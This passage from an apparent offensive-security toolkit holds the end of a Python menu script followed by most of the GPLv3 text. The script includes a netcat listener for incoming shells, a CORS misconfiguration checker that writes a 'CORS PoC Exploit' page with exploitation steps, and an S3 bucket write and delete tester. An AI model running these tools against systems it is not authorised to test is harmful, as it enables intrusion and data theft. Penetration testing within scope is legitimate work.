print(NEWLINE) 531 | 532 | 533 | def js_url_parser(): 534 | def extract_urls(content): 535 | urls = re.findall( 536 | 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', content.lower()) 537 | clean_urls = [] 538 | for url in urls: 539 | last_char = url[-1] 540 | if bool(re.match(r'[^a-zA-Z0-9/]', last_char)): 541 | clean_urls.append(url[:-1]) 542 | else: 543 | clean_urls.append(url) 544 | return clean_urls 545 | 546 | file_name = input('File name (e.g tests/test.js):') 547 | print(NEWLINE + "Extracting Url from %s..." % file_name) 548 | line() 549 | urls = extract_urls(open(file_name, 'r').read()) 550 | for url in urls: 551 | print(url) 552 | line() 553 | 554 | 555 | def target_domain(): 556 | HEADERS = {"X-XSS-Protection": ['1; mode=block'], 557 | "X-Content-Type-Options": ['nosniff'], 558 | "X-Frame-Options": ['DENY', 'SAMEORIGIN'], 559 | "Cache-Control": ['no-store, no-cache', 'no-cache, no-store'], 560 | "Content-Security-Policy": [None], 561 | "WebKit-X-CSP": [None], 562 | "X-Content-Security-Policy": [None], 563 | "Strict-Transport-Security": [None], 564 | "Access-Control-Allow-Origin": [None], 565 | "Origin": []} 566 | 567 | domain = input('Target Domain(e.g google.com): ') 568 | 569 | def passed(bar): 570 | print("PASS = " + bar) 571 | 572 | def failed(bar): 573 | print("FAIL = " + bar) 574 | 575 | def info(host): 576 | print("-----------------------------------") 577 | print("Target - " + host) 578 | print("-----------------------------------") 579 | 580 | def format_url(url): 581 | if not url.startswith("http://") or not url.startswith("https://"): 582 | return "http://" + url 583 | return url 584 | 585 | url = format_url(domain) 586 | response = requests.get(url) 587 | info(url) 588 | for header in HEADERS.keys(): 589 | try: 590 | headval = response.headers[header] 591 | if headval in HEADERS[header]: 592 | if HEADERS[header] == "Origin": 593 | if headval != None: 594 | failed(header + ': ' + str(headval)) 595 | else: 596 | passed(header + ': ' + str(headval)) 597 | passed(header + ': ' + str(headval)) 598 | else: 599 | failed(header + ': ' + str(headval)) 600 | except KeyError: 601 | pass 602 | line() 603 | 604 | 605 | def listener(): 606 | choice = int( 607 | input(NEWLINE + '[1] Run Listener \n[2] Install Package\n\nSelection:')) 608 | if choice == 1: 609 | port = input('Enter listening port: ') 610 | print("Incomming connection will be connected automatically on port %s") 611 | os.system('ncat -vv -n -l -p ' + port) 612 | elif choice == 2: 613 | os.system('git clone https://github.com/nmap/nmap; cd nmap') 614 | os.system('./configure;make;make install') 615 | 616 | 617 | def info_gather(): 618 | print("Gathering information...") 619 | line() 620 | print("\tLISTENING Connections") 621 | os.system('lsof -iTCP -sTCP:LISTEN -n -P') 622 | line() 623 | print("\tESTABLISHED Connections") 624 | os.system('lsof -s -i -n -P | grep ESTABLISHED') 625 | line() 626 | 627 | 628 | def cors_config(): 629 | target_url = input( 630 | 'Target Url (e.g https://api.edmodo.com/users/id): ') 631 | evil = input('localhost/IP (e.g https://localhost): ') 632 | print(NEWLINE + "Site will be vulnerable to CORS misconfiguration if these 2 headers are present in the response") 633 | print("[1]Access-Control-Allow-Credentials: true") 634 | print("[2]Access-Control-Allow-Origin: %s" % (evil)) 635 | line() 636 | os.system('curl %s -H "Origin: %s" -I ' % (target_url, evil)) 637 | exp = input(NEWLINE + '[1]Exploit CORS on %s (y/n): ' % 638 | (target_url)).lower() 639 | if exp == 'y': 640 | print("Creating exploit code...") 641 | print("") 642 | cors_file = open('Cors.html', 'w') 643 | body = """ 644 | 645 | 646 | CORS PoC Exploit 647 | 648 | 649 | 650 | CORS Exploitby HackB0x 651 | 652 | 653 | Exploit 654 | 655 | 668 | 669 | 670 | """ % (target_url) 671 | cors_file.write(body) 672 | cors_file.close() 673 | print( 674 | "exploit created with the name of Cors.html in your current directory") 675 | line() 676 | print(Style.BRIGHT + Fore.GREEN + 677 | "Exploitation Steps" + Style.RESET_ALL) 678 | print( 679 | "[1] Start apache server on your local host\n[2] Paste cors.html in /var/www/html/") 680 | print("[3] Login to %s\n[4] Open cors.html using %s and click exploit" % ( 681 | target_url, evil)) 682 | line() 683 | print(NEWLINE + "Loading main menu...") 684 | 685 | 686 | def aws_s3(): 687 | aws = int( 688 | input("[1]Install AWS Package\n[2]AWS Credential\n[3]Run Program\n\nSelection:")) 689 | if aws == 1: 690 | # os.system('brew install awscli') 691 | os.system('pip install awscli') 692 | elif aws == 2: 693 | line() 694 | print("\t\tSample") 695 | line() 696 | print("""AWS Access Key ID: AKIAIOSFODNN7EXAMPLE 697 | AWS Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 698 | Default region name: us-west-2 699 | Default output format: json""") 700 | print(NEWLINE + NEWLINE) 701 | os.system('aws configure') 702 | elif aws == 3: 703 | aws_program = input( 704 | 'S3 Bucket name (e.g rubyci.s3.amazonaws.com): ') 705 | print(NEWLINE + "Checking write permission. Creating test.txt to %s " % 706 | (aws_program)) 707 | os.system('aws s3 cp ./tests/test.txt s3://%s' % (aws_program)) 708 | print(NEWLINE + "Try Listing files from %s" % (aws_program)) 709 | os.system('aws s3 ls s3://%s' % (aws_program)) 710 | print(NEWLINE + "Try fetching file from %s." % (aws_program)) 711 | os.system('aws s3 cp s3://%s/test.txt ./' % (aws_program)) 712 | print(NEWLINE + "Checking remove permission. removing test.txt from %s" % ( 713 | aws_program)) 714 | os.system('aws s3 rm s3://%s/test.txt' % (aws_program)) 715 | print("Process Done." + NEWLINE) 716 | 717 | else: 718 | print("Invalid number. Try again!!") 719 | 720 | 721 | def banner(): 722 | with open('./src/banner.md', 'r') as myfile: 723 | print(myfile.read()) 724 | 725 | 726 | def quit(): 727 | print(NEWLINE + "Quitting program..." + NEWLINE) 728 | exit(0) 729 | 730 | 731 | def menu(): 732 | banner() 733 | try: 734 | choice = int(input(NEWLINE + "choice: ")) 735 | print(NEWLINE) 736 | if choice == 1: 737 | xss() 738 | menu() 739 | elif choice == 2: 740 | exploits() 741 | menu() 742 | elif choice == 3: 743 | subd() 744 | menu() 745 | elif choice == 4: 746 | whois_geo() 747 | menu() 748 | elif choice == 5: 749 | ssrf_injection() 750 | menu() 751 | elif choice == 6: 752 | nmap_auto_banner() 753 | menu() 754 | elif choice == 7: 755 | js_url_parser() 756 | menu() 757 | elif choice == 8: 758 | target_domain() 759 | menu() 760 | elif choice == 9: 761 | listener() 762 | menu() 763 | elif choice == 10: 764 | info_gather() 765 | menu() 766 | elif choice == 11: 767 | cors_config() 768 | menu() 769 | elif choice == 12: 770 | aws_s3() 771 | menu() 772 | elif choice == 0: 773 | quit() 774 | else: 775 | print("Please enter the correct number") 776 | menu() 777 | except KeyboardInterrupt: 778 | quit() 779 | except Exception as error: 780 | traceback.print_exc() 781 | print(str(error)) 782 | print("Error try again!!") 783 | menu() 784 | 785 | 786 | if __name__ == "__main__": 787 | menu() 788 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | 